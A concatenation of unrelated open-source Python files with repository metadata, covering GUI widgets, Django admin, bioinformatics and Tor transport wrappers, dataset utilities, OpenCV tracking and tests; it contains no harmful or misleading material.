style = style | wx.TE_MULTILINE | wx.TE_NO_VSCROLL | wx.TE_RICH2
# init the base class
wx.TextCtrl.__init__(self, parent, id, value, pos, (w, h),
style, validator, name)
# save some basic metrics
self.extraHeight = self.defaultHeight - self.GetCharHeight()
self.numLines = 1
self.maxHeight = -1
self.minHeight = -1
if value:
wx.CallAfter(self._adjustCtrl)
self.Bind(wx.EVT_TEXT, self.OnTextChanged)
def SetMinHeight(self,h):
self.minHeight = h
if h != -1 and self.GetSize().height < h:
self.SetSize((-1, h))
def GetMinHeight(self):
return self.minHeight
def SetMaxHeight(self, h):
"""
Sets the max height that the control will expand to on its
own, and adjusts it down if needed.
"""
self.maxHeight = h
if h != -1 and self.GetSize().height > h:
self.SetSize((-1, h))
def GetMaxHeight(self):
"""Sets the max height that the control will expand to on its own"""
return self.maxHeight
def SetFont(self, font):
wx.TextCtrl.SetFont(self, font)
self.numLines = -1
self._adjustCtrl()
def WriteText(self, text):
# work around a bug of a lack of a EVT_TEXT when calling
# WriteText on wxMac
wx.TextCtrl.WriteText(self, text)
self._adjustCtrl()
def AppendText(self, text):
# Instead of using wx.TextCtrl.AppendText append and set the
# insertion point ourselves. This works around a bug on wxMSW
# where it scrolls the old text out of view, and since there
# is no scrollbar there is no way to get back to it.
self.SetValue(self.GetValue() + text)
self.SetInsertionPointEnd()
def OnTextChanged(self, evt):
# check if any adjustments are needed on every text update
self._adjustCtrl()
evt.Skip()
def _adjustCtrl(self):
# if the current number of lines is different than before
# then recalculate the size needed and readjust
numLines = self.GetNumberOfLines()
if numLines != self.numLines:
self.numLines = numLines
charHeight = self.GetCharHeight()
height = numLines * charHeight + self.extraHeight
#TODO: should be more precise
if self.minHeight != -1 and height < self.minHeight and self.Size.height > self.minHeight:
height = self.minHeight
if self.maxHeight != -1 and height > self.maxHeight and self.Size.height < self.maxHeight:
height = self.maxHeight
if not (self.maxHeight != -1 and height > self.maxHeight) and not (self.minHeight != -1 and height < self.minHeight):
# The size is changing... if the control is not in a
# sizer then we just want to change the size and
# that's it, the programmer will need to deal with
# potential layout issues. If it is being managed by
# a sizer then we'll change the min size setting and
# then try to do a layout. In either case we'll also
# send an event so the parent can handle any special
# layout issues that it wants to deal with.
if self.GetContainingSizer() is not None:
mw, mh = self.GetMinSize()
self.SetMinSize((mw, height))
if self.GetParent().GetSizer() is not None:
self.GetParent().Layout()
else:
self.GetContainingSizer().Layout()
else:
self.SetSize((-1, height))
# send notification that layout is needed
evt = wx.PyCommandEvent(wxEVT_ETC_LAYOUT_NEEDED, self.GetId())
evt.SetEventObject(self)
evt.height = height
evt.numLines = numLines
self.GetEventHandler().ProcessEvent(evt)
def _getDefaultHeight(self, parent):
# checked for cached value
if self.__class__._defaultHeight != -1:
return self.__class__._defaultHeight
# otherwise make a single line textctrl and find out its default height
tc = wx.TextCtrl(parent)
sz = tc.GetSize()
tc.Destroy()
self.__class__._defaultHeight = sz.height
return sz.height
if 'wxGTK' in wx.PlatformInfo: ## and wx.VERSION < (2,7): it's broke again in 2.7.2...
# the wxGTK version of GetNumberOfLines in 2.6 doesn't count
# wrapped lines, so we need to implement our own. This is
# fixed in 2.7.
def GetNumberOfLines(self):
text = self.GetValue()
width = self.GetSize().width
dc = wx.ClientDC(self)
dc.SetFont(self.GetFont())
count = 0
for line in text.split('\n'):
count += 1
w, h = dc.GetTextExtent(line)
if w > width:
# the width of the text is wider than the control,
# calc how many lines it will be wrapped to
count += self._wrapLine(line, dc, width)
if not count:
count = 1
return count
def _wrapLine(self, line, dc, width):
# Estimate where the control will wrap the lines and
# return the count of extra lines needed.
pte = dc.GetPartialTextExtents(line)
width -= wx.SystemSettings.GetMetric(wx.SYS_VSCROLL_X)
idx = 0
start = 0
count = 0
spc = -1
while idx < len(pte):
if line[idx] == ' ':
spc = idx
if pte[idx] - start > width:
# we've reached the max width, add a new line
count += 1
# did we see a space? if so restart the count at that pos
if spc != -1:
idx = spc + 1
spc = -1
start = pte[idx]
else:
idx += 1
return count
#---------------------------------------------------------------------------
| {
"content_hash": "ed9ccabfedc0e9b3593fe9e3baa326a9",
"timestamp": "",
"source": "github",
"line_count": 215,
"max_line_length": 129,
"avg_line_length": 38.64186046511628,
"alnum_prop": 0.5652383245064998,
"repo_name": "ifwe/wxpy",
"id": "4c5b876eac82f0c20fe33ead4c6ac70f536132ce",
"size": "8834",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wx/lib/expando.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
from django.contrib import admin
from . import models
class GithubFeedAdmin(admin.ModelAdmin):
list_display = ['username']
fields = ['username', 'token', 'api_key']
search_fields = ['username']
admin.site.register(models.GithubFeed, GithubFeedAdmin)
| {
"content_hash": "02192a57d4ca4f41ba5485d310fee51e",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 55,
"avg_line_length": 26.5,
"alnum_prop": 0.720754716981132,
"repo_name": "harveyr/django-aggregape",
"id": "f4c825dcfa5051e82067a2926a65d881722e0c68",
"size": "265",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "137091"
},
{
"name": "JavaScript",
"bytes": "58577"
},
{
"name": "Python",
"bytes": "2575"
}
],
"symlink_target": ""
} |
def preBuildPage(page, context, data):
"""
Called prior to building a page.
:param page: The page about to be built
:param context: The context for this page (you can modify this, but you must return it)
:param data: The raw body for this page (you can modify this).
:returns: Modified (or not) context and data.
"""
return context, data
def postBuildPage(page):
"""
Called after building a page.
:param page: The page that was just built.
:returns: None
"""
pass
def preBuildStatic(static):
"""
Called before building (copying to the build folder) a static file.
:param static: The static file about to be built.
:returns: None
"""
pass
def postBuildStatic(static):
"""
Called after building (copying to the build folder) a static file.
:param static: The static file that was just built.
:returns: None
"""
pass
def preBuild(site):
"""
Called prior to building the site, after loading configuration and plugins.
A good time to register your externals.
:param site: The site about to be built.
:returns: None
"""
pass
def postBuild(site):
"""
Called after building the site.
:param site: The site that was just built.
:returns: None
"""
pass
def preDeploy(site):
"""
Called prior to deploying the site (built files)
A good time to configure custom headers
:param site: The site about to be deployed.
:returns: None
"""
pass
def postDeploy(site):
"""
Called after deploying the site (built files)
:param site: The site that was just built.
:returns: None
"""
pass
def preDeployFile(file):
"""
Called prior to deploying a single built file
:param file: The file about to be deployed.
:returns: None
"""
pass
ORDER = -1
DEFAULTS = [
'preBuildPage',
'postBuildPage',
'preBuildStatic',
'postBuildStatic',
'preBuild',
'postBuild',
'preDeploy',
'postDeploy',
'preDeployFile',
]
| {
"content_hash": "55deddb3f42fcf212d4fff799f3a2d8a",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 91,
"avg_line_length": 18.990825688073393,
"alnum_prop": 0.6314009661835749,
"repo_name": "Knownly/Cactus",
"id": "22561d01436b17a5cc71ee60dd87e8bf4682f2a8",
"size": "2115",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "cactus/plugin/defaults.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "261"
},
{
"name": "HTML",
"bytes": "8133"
},
{
"name": "JavaScript",
"bytes": "60"
},
{
"name": "Makefile",
"bytes": "448"
},
{
"name": "Python",
"bytes": "237704"
}
],
"symlink_target": ""
} |
from distutils.core import setup
setup(name='gather-agent',
version='0.4.1',
description='Simple agent that gathers basic system statistics to RHQ Metrics',
author='Michael Burman'
author_email='miburman@redhat.com',
url='http://github.com/burmanm/gather_agent',
packages='gather_agent'
)
| {
"content_hash": "6895267e2d025b974b9f0cecc91fddaa",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 85,
"avg_line_length": 33.2,
"alnum_prop": 0.6746987951807228,
"repo_name": "burmanm/gather_agent",
"id": "b42926ae91e6023fa9b1ece1596bb1de434edc68",
"size": "355",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "11803"
}
],
"symlink_target": ""
} |
import os
import sys
import glob
import json
import unittest
sys.path.append(os.path.dirname(os.getcwd()))
import tasks
class TestInfoFiles(unittest.TestCase):
"""Test case for checking info files exist
for each task and have a valid structure.
"""
@classmethod
def setUpClass(self):
self.tasks = set(tasks.__all__)
self.tasks.remove('template_task')
self.tasks.remove('dev_pretend_py')
self.tasks.remove('ogr')
self.tasks.remove('sample_task')
self.tasks.remove('utils')
self.info_dir = os.path.abspath(os.path.join(os.getcwd(), '..', 'info'))
self.json_files = set([os.path.basename(f).split('.')[0] for f in glob.glob(os.path.join(self.info_dir, '*.info.json'))])
self.names = []
self.runner = set()
self.display = set()
files_to_test = self.json_files.intersection(self.tasks)
for name in files_to_test:
test_file = os.path.join(self.info_dir, '{0}.info.json'.format(name))
with open(test_file) as f:
print test_file
d = json.load(f)
self.names.append(d['name'])
self.runner.add(d['runner'])
self.display.add(d['display'].keys()[0])
def test_json_exists(self):
"""Ensure an info.json file exists for each task"""
self.assertEqual(self.tasks.issubset(self.json_files), True)
def test_json_names(self):
"""Verify each info.json has a valid name field and value"""
self.assertEqual(sorted(list(self.tasks)), sorted(self.names))
def test_json_runner(self):
self.assertEqual(len(list(self.runner)) == 1 and list(self.runner)[0] == 'python', True)
def test_json_display(self):
"""Default display should be set to 'en' for all info.json files"""
self.assertEqual(len(list(self.display)) == 1 and list(self.display)[0] == 'en', True)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "7c13b5fc50f52d70858f44d1e003de40",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 129,
"avg_line_length": 37.43396226415094,
"alnum_prop": 0.6038306451612904,
"repo_name": "voyagersearch/voyager-py",
"id": "9be7a1ed9466052b8e230e4d4a490f23a3f62b75",
"size": "1984",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "processing/test/test_info_files.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "13"
},
{
"name": "Python",
"bytes": "1008753"
},
{
"name": "Shell",
"bytes": "14"
}
],
"symlink_target": ""
} |
'''
*****************************************
Author: zhlinh
Email: zhlinhng@gmail.com
Version: 0.0.1
Created Time: 2016-05-07
Last_modify: 2016-05-07
******************************************
'''
'''
Given an array containing n distinct numbers taken from 0, 1, 2, ..., n,
find the one that is missing from the array.
For example,
Given nums = [0, 1, 3] return 2.
Note:
Your algorithm should run in linear runtime complexity.
Could you implement it using only constant extra space complexity?
Credits:
Special thanks to @jianchao.li.fighter for adding this problem and
creating all test cases.
'''
class Solution(object):
def missingNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
n = len(nums)
res = n
for i in range(n):
res ^= nums[i]
res ^= i
return res
| {
"content_hash": "836c8d7297f427823cfc6b88c36ff461",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 72,
"avg_line_length": 23.076923076923077,
"alnum_prop": 0.55,
"repo_name": "zhlinh/leetcode",
"id": "ecf397e9d0c99fcd87b579aecb9ccc2da380bfd1",
"size": "946",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "0268.Missing Number/solution.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "478111"
}
],
"symlink_target": ""
} |
import pandas as pd
from h2o.estimators.xgboost import *
from tests import pyunit_utils
import unittest
import sys
class TestXGBoostUnicode(unittest.TestCase):
@unittest.skipIf(sys.version_info[0] < 3, "not tested on 2.7: csv.writer fails on 'ascii' codec can't encode character") #unrelated issue
def test_xgboost_unicode(self):
assert H2OXGBoostEstimator.available()
unic_df = pd.DataFrame({u'\xA5': [2, 3, 1], 'y': [0, 0, 1], 'x': [0.3, 0.1, 0.9]})
h2o_unic = h2o.H2OFrame(unic_df, destination_frame="unic_df")
xg1 = H2OXGBoostEstimator(model_id = 'xg1', ntrees = 3)
xg1.train(x = [u'\xA5', 'x'], y = "y", training_frame=h2o_unic)
if __name__ == "__main__":
pyunit_utils.standalone_test(unittest.main)
else:
suite = unittest.TestLoader().loadTestsFromTestCase(TestXGBoostUnicode)
unittest.TextTestRunner().run(suite) | {
"content_hash": "b55dd990701abb4f808aa05137c2cd93",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 141,
"avg_line_length": 36.916666666666664,
"alnum_prop": 0.6704288939051919,
"repo_name": "h2oai/h2o-dev",
"id": "404d36c05eeb2145dda43b65f4344c740317062d",
"size": "886",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "h2o-py/tests/testdir_jira/pyunit_pubdev_5207_xgb_unicode.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "5090"
},
{
"name": "CSS",
"bytes": "162399"
},
{
"name": "CoffeeScript",
"bytes": "267048"
},
{
"name": "Emacs Lisp",
"bytes": "6465"
},
{
"name": "HTML",
"bytes": "140849"
},
{
"name": "Java",
"bytes": "6216622"
},
{
"name": "JavaScript",
"bytes": "38932"
},
{
"name": "Jupyter Notebook",
"bytes": "5585408"
},
{
"name": "Makefile",
"bytes": "34105"
},
{
"name": "Python",
"bytes": "2644394"
},
{
"name": "R",
"bytes": "1848754"
},
{
"name": "Rebol",
"bytes": "7059"
},
{
"name": "Ruby",
"bytes": "3506"
},
{
"name": "Scala",
"bytes": "22830"
},
{
"name": "Shell",
"bytes": "47513"
},
{
"name": "TeX",
"bytes": "579960"
}
],
"symlink_target": ""
} |
"""
Copyright 2017, Ben Langmead <langmea@cs.jhu.edu>
Concrete subclass for HISAT2 aligner.
"""
import os
import logging
import sys
from operator import itemgetter
from subprocess import Popen
from aligner import Aligner
try:
from Queue import Queue
except ImportError:
from queue import Queue # python 3.x
class Hisat2(Aligner):
""" Encapsulates a HISAT2 process. The input can be a FASTQ
file, or a Queue onto which the caller enqueues reads.
Similarly, output can be a SAM file, or a Queue from which the
caller dequeues SAM records. All records are textual; parsing
is up to the user. """
def __init__(self,
cmd,
aligner_args,
aligner_unpaired_args,
aligner_paired_args,
index,
unpaired=None,
paired=None,
paired_combined=None,
pairs_only=False,
sam=None,
quiet=False,
input_format=None):
""" Create new process.
Inputs:
'unpaired' is an iterable over unpaired input filenames.
'paired' is an iterable over pairs of paired-end input
filenames. If both are None, then input reads will be
taken over the inQ. If either are non-None, then a call
to inQ will raise an exception.
Outputs:
'sam' is a filename where output SAM records will be
stored. If 'sam' is none, SAM records will be added to
the outQ.
"""
if index is None:
raise RuntimeError('Must specify --index when aligner is HISAT2')
cmd_toks = cmd.split()
popen_stdin, popen_stdout, popen_stderr = None, None, None
self.inQ, self.outQ = None, None
# Make sure input arguments haven't been specified already
for tok in ['-U', '-1', '-2']:
assert tok not in cmd_toks
# Compose input arguments
input_args = []
# Some of the HISAT 2's format-related parameters take an
# argument (e.g. -U, -1, -2, --tab5, --tab6) and some don't
# (-f, -q, -r, -c)
if input_format in ['fastq', 'fasta', 'raw']:
if input_format == 'fastq':
input_args.append('-q')
elif input_format == 'fastq':
input_args.append('-f')
elif input_format == 'raw':
input_args.append('-r')
input_format = None
if unpaired is not None:
input_args.append(('--%s' % input_format) if input_format is not None else '-U')
input_args.append(','.join(unpaired))
input_args.extend(aligner_unpaired_args)
if paired is not None:
assert input_format not in ['tab5', 'tab6', '12']
paired = list(paired) # because we traverse it multiple times
input_args.extend(['-1', ','.join(map(itemgetter(0), paired))])
input_args.extend(['-2', ','.join(map(itemgetter(1), paired))])
input_args.extend(aligner_paired_args)
if paired_combined is not None:
assert input_format is not None
input_args.extend(['--%s' % input_format, ','.join(paired_combined)])
input_args.extend(aligner_paired_args)
if unpaired is None and paired is None and paired_combined is None:
raise RuntimeError("Must specify one or more of: unpaired, paired, paired_combined")
# Make sure output arguments haven't been specified already
assert '-S' not in cmd_toks
# Compose output arguments
output_args = []
if sam is not None:
output_args.extend(['-S', sam])
else:
raise RuntimeError("Must specify SAM output")
index_args = ['-x', index]
# Put all the arguments together
input_args.extend(aligner_args)
cmd += ' '
cmd += ' '.join(input_args + output_args + index_args)
logging.info('HISAT 2 command: ' + cmd)
if quiet:
popen_stderr = open(os.devnull, 'w')
self.pipe = Popen(cmd, shell=True,
stdin=popen_stdin, stdout=popen_stdout, stderr=popen_stderr,
bufsize=-1, close_fds='posix' in sys.builtin_module_names)
@staticmethod
def supports_mix():
return True
| {
"content_hash": "1643610a9869799d6bdd255beb844b85",
"timestamp": "",
"source": "github",
"line_count": 116,
"max_line_length": 96,
"avg_line_length": 38.75,
"alnum_prop": 0.5563959955506118,
"repo_name": "BenLangmead/qtip",
"id": "6ee7d37ef90535c378ab93b7254cdbdcdd2f2249",
"size": "4495",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hisat2.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5060"
},
{
"name": "C++",
"bytes": "224703"
},
{
"name": "Makefile",
"bytes": "8422"
},
{
"name": "Python",
"bytes": "136883"
},
{
"name": "Shell",
"bytes": "3774"
}
],
"symlink_target": ""
} |
"""
Low-level parts of pyptlib that are only useful to clients.
"""
from pyptlib.config import Config
class ClientConfig(Config):
"""
A client-side pyptlib configuration.
:raises: :class:`pyptlib.config.EnvError` if environment was incomplete or corrupted.
"""
def __init__(self):
Config.__init__(self)
self.transports = self.get('TOR_PT_CLIENT_TRANSPORTS').split(',')
if '*' in self.transports:
self.allTransportsEnabled = True
self.transports.remove('*')
def getClientTransports(self): # XXX why is this client-specific ???
"""
Return a list of strings representing the client transports reported by Tor.
If present, the wildcard transport, '*', is stripped from this list and used to set allTransportsEnabled to True.
:returns: list of transports
"""
return self.transports
def writeMethod(self, name, socksVersion, addrport, args=None, optArgs=None):
"""
Write a message to stdout announcing that a transport was
successfully launched.
:param str name: Name of transport.
:param int socksVersion: The SOCKS protocol version.
:param tuple addrport: (addr,port) where this transport is listening for connections.
:param str args: ARGS field for this transport.
:param str optArgs: OPT-ARGS field for this transport.
"""
methodLine = 'CMETHOD %s socks%s %s:%s' % (name, socksVersion,
addrport[0], addrport[1])
if args and len(args) > 0:
methodLine = methodLine + ' ARGS=' + args.join(',')
if optArgs and len(optArgs) > 0:
methodLine = methodLine + ' OPT-ARGS=' + args.join(',')
self.emit(methodLine)
def writeMethodError(self, name, message):
"""
Write a message to stdout announcing that we failed to launch a transport.
:param str name: Name of transport.
:param str message: Error message.
"""
self.emit('CMETHOD-ERROR %s %s' % (name, message))
def writeMethodEnd(self):
"""
Write a message to stdout announcing that we finished launching transports..
"""
self.emit('CMETHODS DONE')
| {
"content_hash": "fb22064c7780d7a9100b43222782e376",
"timestamp": "",
"source": "github",
"line_count": 69,
"max_line_length": 121,
"avg_line_length": 32.768115942028984,
"alnum_prop": 0.6218487394957983,
"repo_name": "ch3n2k/pyptlib",
"id": "33e34a61d0a4addad0d41e196c12730904d54bea",
"size": "2304",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "pyptlib/client_config.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "48859"
}
],
"symlink_target": ""
} |
from typing import Dict, List, Optional, Union, Sequence
import numpy as np
import tensorflow as tf
from typing_extensions import Literal
from odin.backend.types_helpers import DataType, LabelType
from tensorflow.python.data import Dataset
# ===========================================================================
# Helpers
# ===========================================================================
Partition = Literal['train', 'valid', 'test', 'unlabelled']
def get_partition(part,
train=None,
valid=None,
test=None,
unlabeled=None,
unlabelled=None,
**kwargs):
r""" A function for automatically select the right data partition """
part = str(part).lower().strip()
ret = None
if 'train' in part:
ret = train
elif 'valid' in part:
ret = valid
elif 'test' in part:
ret = test
elif 'unlabeled' in part or 'unlabelled' in part:
ret = unlabeled if unlabelled is None else unlabelled
for k, v in kwargs.items():
if part == str(k).strip().lower():
ret = v
break
if ret is None:
raise ValueError("No data for partition with name: '%s'" % part)
return ret
def _merge_list(data):
return [
np.concatenate([x[i].numpy()
for x in data], axis=0)
for i in range(len(data[0]))
]
def _merge_dict(data):
data = {k: [x[k] for x in data] for k in data[0].keys()}
ret = {}
for k, v in data.items():
if tf.is_tensor(v[0]):
ret[k] = _merge_tensor(v)
elif isinstance(v[0], (tuple, list)):
ret[k] = _merge_list(v)
else:
ret[k] = _merge_dict(v)
return ret
def _merge_tensor(data):
return np.concatenate(data, axis=0)
# ===========================================================================
# Main
# ===========================================================================
class IterableDataset:
def __init__(self, *args, **kwargs):
pass
@classmethod
def data_type(cls) -> DataType:
raise NotImplementedError
@property
def label_type(self) -> LabelType:
raise NotImplementedError
@property
def name(self) -> str:
"""name of the dataset (all lower-case characters)"""
return self.__class__.__name__.lower()
@property
def has_labels(self) -> bool:
return self.n_labels > 0
@property
def n_labels(self) -> int:
return len(self.labels)
@property
def labels_indices(self) -> Dict[str, int]:
if not hasattr(self, "_labels_indices"):
self._labels_indices = {j: i for i, j in enumerate(self.labels)}
return self._labels_indices
@property
def labels(self) -> np.ndarray:
return np.array([])
@property
def shape(self) -> List[int]:
"""Return shape of single example (i.e. no batch dimension)"""
raise NotImplementedError()
@property
def full_shape(self) -> Sequence[Union[None, int]]:
"""Return the shape with batch dimension"""
return (None,) + tuple([i for i in self.shape])
@property
def binarized(self) -> bool:
raise NotImplementedError()
def create_dataset(self,
partition: Partition = 'train',
*,
batch_size: Optional[int] = 32,
drop_remainder: bool = False,
shuffle: int = 1000,
prefetch: int = tf.data.experimental.AUTOTUNE,
cache: str = '',
parallel: Optional[int] = None,
label_percent: bool = False,
seed: int = 1) -> tf.data.Dataset:
""" Create tensorflow Dataset """
raise NotImplementedError()
def numpy(self,
batch_size: int = 32,
drop_remainder: bool = False,
shuffle: int = 1000,
prefetch: int = tf.data.experimental.AUTOTUNE,
cache: str = '',
parallel: Optional[int] = None,
partition: Partition = 'train',
label_percent: bool = False,
seed: int = 1,
verbose: bool = False):
"""Return the numpy data returned when iterate the partition"""
kw = dict(locals())
kw.pop('self', None)
verbose = kw.pop('verbose')
ds = self.create_dataset(**kw)
# load the data
if verbose:
from tqdm import tqdm
ds = tqdm(ds, desc='Converting dataset to numpy')
data = [x for x in ds]
# post-process the data
if isinstance(data[0], (tuple, list)):
data = _merge_list(data)
elif tf.is_tensor(data[0]):
data = _merge_tensor(data)
elif isinstance(data[0], dict):
data = _merge_dict(data)
else:
raise NotImplementedError(f'{type(data[0])}')
return data
| {
"content_hash": "1ae5e53f6c6e104427e37b3128401d7f",
"timestamp": "",
"source": "github",
"line_count": 165,
"max_line_length": 77,
"avg_line_length": 28.64848484848485,
"alnum_prop": 0.5422043579437276,
"repo_name": "imito/odin",
"id": "555ba377d55e254ed84ba90e65c4faa9cefb8a2b",
"size": "4727",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "odin/fuel/dataset_base.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1516670"
}
],
"symlink_target": ""
} |
from bibliopixel.animation.matrix import Matrix
from bibliopixel.util import log
import numpy as np
try:
import cv2
except ImportError:
log.error('Could not import cv2 library')
import os
grab = None
if os.name == 'nt':
try:
from desktopmagic.screengrab_win32 import getRectAsImage, getScreenAsImage
log.debug("Using desktopmagic module")
def nt_grab(bbox=None):
if bbox is None:
img = getScreenAsImage()
else:
img = getRectAsImage(bbox)
return img
grab = nt_grab
except Exception:
pass
if grab is None:
try:
from mss.linux import MSS as mss
from PIL import Image
sct = mss()
monitor = sct.monitors[0]
def mss_grab(bbox):
sct_img = sct.grab(monitor)
img = Image.frombytes('RGBA', sct_img.size, bytes(sct_img.raw), 'raw', 'BGRA').crop(bbox)
img = img.convert('RGB')
return img
grab = mss_grab
log.debug('Using mss module')
except Exception:
try:
from PIL import ImageGrab
grab = ImageGrab.grab
log.debug("Using PIL ImageGrab module")
except Exception:
try:
import pyscreenshot as ImageGrab
grab = ImageGrab.grab
log.debug("Using pyscreenshot module")
except Exception:
log.error("Unable to find any available screenshot option.")
grab = None
class ScreenGrab(Matrix):
def __init__(self, layout, bbox=(300, 300, 332, 332), mirror=False,
offset=0.0, crop=True, **kwds):
super().__init__(layout, **kwds)
if not sum(bbox):
bbox = None
self.bbox = bbox
self.crop = crop
self.mirror = mirror
self.image = frame = self._capFrame()
self._iw = frame.shape[1]
self._ih = frame.shape[0]
self.width = self.width
self.height = self.height
# self._scale = (self.height*1.0//self._ih)
self._cropY = 0
self._cropX = 0
xoffset = yoffset = offset
if xoffset > 1.0:
xoffset = 1.0
elif xoffset < -1.0:
xoffset = -1.0
if yoffset > 1.0:
yoffset = 1.0
elif yoffset < -1.0:
yoffset = -1.0
xoffset += 1.0
yoffset += 1.0
if self.height >= self.width:
self._cropX = (self._iw - int(self.width / (self.height / float(self._ih)))) // 2
if self._ih >= self._iw:
scale = (self.height * 1.0) // self._ih
else:
scale = (self.width * 1.0) // self._iw
else:
self._cropY = (self._ih - int(self.height / (self.width / float(self._iw)))) // 2
if self._ih >= self._iw:
scale = (self.width * 1.0) // self._iw
else:
scale = (self.height * 1.0) // self._ih
scaleW = int(self.width / scale)
scaleH = int(self.height / scale)
padTB = (scaleH - self._ih) // 2
padLR = (scaleW - self._iw) // 2
padYoff = int(round(padTB * yoffset)) - padTB
padXoff = int(round(padLR * xoffset)) - padLR
self._pad = (padTB + padYoff, padTB - padYoff,
padLR + padXoff, padLR - padXoff)
self.xoff = int(round(self._cropX * xoffset)) - self._cropX
self.yoff = int(round(self._cropY * yoffset)) - self._cropY
def _capFrame(self):
img = grab(self.bbox)
return np.array(img)
def step(self, amt=1):
image = self._capFrame()
if self.crop:
image = image[self._cropY + self.yoff:self._ih - self._cropY +
self.yoff, self._cropX + self.xoff:self._iw - self._cropX + self.xoff]
else:
t, b, l, r = self._pad
image = cv2.copyMakeBorder(
image, t, b, l, r, cv2.BORDER_CONSTANT, value=[0, 0, 0])
resized = cv2.resize(image, (self.width, self.height),
interpolation=cv2.INTER_LINEAR)
if self.mirror:
resized = cv2.flip(resized, 1)
for y in range(self.height):
for x in range(self.width):
self.layout.set(x, y, tuple(resized[y, x][0:3]))
| {
"content_hash": "6908d170b978131835a9f9b421b184e9",
"timestamp": "",
"source": "github",
"line_count": 146,
"max_line_length": 101,
"avg_line_length": 30,
"alnum_prop": 0.5159817351598174,
"repo_name": "rec/BiblioPixelAnimations",
"id": "084647c7d5ada8da68d593861321297f4e9280fb",
"size": "4380",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "BiblioPixelAnimations/matrix/ScreenGrab.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "176882"
}
],
"symlink_target": ""
} |
"""
Ball tracking example with OpenCV
http://www.pyimagesearch.com/2015/09/14/ball-tracking-with-opencv/
"""
import os
import cv2
from collections import deque
import numpy as np
def main():
"""Capture video and draw tracking box"""
# define the lower and upper boundaries of the "color" (via range_detector.py)
# ball in the HSV color space, then initialize the
# list of tracked points
buffer = 64
lowerRanges = (53, 3, 24)
upperRanges = (224, 139, 255)
pts = deque(maxlen=buffer)
cap = cv2.VideoCapture(0)
while True:
# capture video frames
ret, frame = cap.read()
# resize the frame, blur it, and convert it to the HSV
# color space
#frame = imutils.resize(frame, width=600)
frame = cv2.resize(frame, (0, 0), fx=0.5, fy=0.5)
blurred = cv2.GaussianBlur(frame, (11, 11), 0)
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# construct a mask for the color "green", then perform
# a series of dilations and erosions to remove any small
# blobs left in the mask
mask = cv2.inRange(hsv, lowerRanges, upperRanges)
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
# find contours in the mask and initialize the current
# (x, y) center of the ball
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)[-2]
center = None
# only proceed if at least one contour was found
if len(cnts) > 0:
# find the largest contour in the mask, then use
# it to compute the minimum enclosing circle and
# centroid
c = max(cnts, key=cv2.contourArea)
((x, y), radius) = cv2.minEnclosingCircle(c)
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
# only proceed if the radius meets a minimum size
if radius > 10:
# draw the circle and centroid on the frame,
# then update the list of tracked points
cv2.circle(frame, (int(x), int(y)), int(radius),
(0, 255, 255), 2)
cv2.circle(frame, center, 5, (0, 0, 255), -1)
# update the points queue
pts.appendleft(center)
# loop over the set of tracked points
for i in xrange(1, len(pts)):
# if either of the tracked points are None, ignore
# them
if pts[i - 1] is None or pts[i] is None:
continue
# otherwise, compute the thickness of the line and
# draw the connecting lines
thickness = int(np.sqrt(buffer / float(i + 1)) * 2.5)
cv2.line(frame, pts[i - 1], pts[i], (0, 0, 255), thickness)
cv2.imshow('frame', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# release the capture
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
main()
| {
"content_hash": "4fde9b72fcfcdfa1ea7d9f962cb34611",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 82,
"avg_line_length": 34.32222222222222,
"alnum_prop": 0.5642602784072516,
"repo_name": "jhertzog/pi",
"id": "dea3abdbe6d06e55f7a1fc477cc33864b873b85a",
"size": "3089",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "video_object_tracking.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "17562"
},
{
"name": "Shell",
"bytes": "190"
}
],
"symlink_target": ""
} |
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ListObjectTypes(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ListObjectTypes Choreo. A TembooSession object, containing a valid
